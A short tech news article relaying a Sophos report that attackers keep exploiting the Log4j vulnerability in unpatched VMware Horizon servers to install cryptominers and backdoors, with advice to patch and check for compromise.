Threat actors continue trying to compromise VMWare Horizon systems through unpatched vulnerabilities in applications’ Log4j2 Java libraries, say researchers at Sophos.
In a report issued this week, the company says attempts to leverage Horizon and install cryptocurrency mining software or backdoors grew in January. And while the attempts have dropped off since then, they are continuing.
“The largest wave of Log4j attacks aimed at Horizon that we have detected began January 19, and is still ongoing,” the report says. Unlike others, this wave doesn’t rely on an installed Cobalt Strike beacon back to the hackers. Instead, the cryptominer installer script is directly executed from the Apache Tomcat component of the Horizon server.
Discovered in December, 2021, the vulnerability (CVE-2021-44228) enables a remote attacker to take control of a device on the internet through text messages if it runs certain versions of Log4j2. Apache had to issue four patches to address this and subsequently discovered holes.
“Organizations should thoroughly research their exposure to potential Log4j vulnerabilities, as they may impact commercial, open-source and custom software that in some cases may not have regular security support,” says the Sophos report. “But platforms such as Horizon are particularly attractive targets to all types of malicious actors because they are widespread and can (if still vulnerable) easily found and exploited with well-tested tools.”
The report notes that VMWare issued patches for Horizon on March 8. But, it adds, many organizations may still not have deployed the fixed versions or applied workarounds to vulnerable ones. “Even if they have,” the report says, “as demonstrated by the backdoors and reverse shell activity we found, those systems may already be compromised in other ways.”
Hackers still trying to compromise VMWare Horizon through Log4j bug, says Sophos
Share post:
SUBSCRIBE NOW
Related articles
Become a member
New, Relevant Tech Stories. Our article selection is done by industry professionals. Our writers summarize them to give you the key takeaways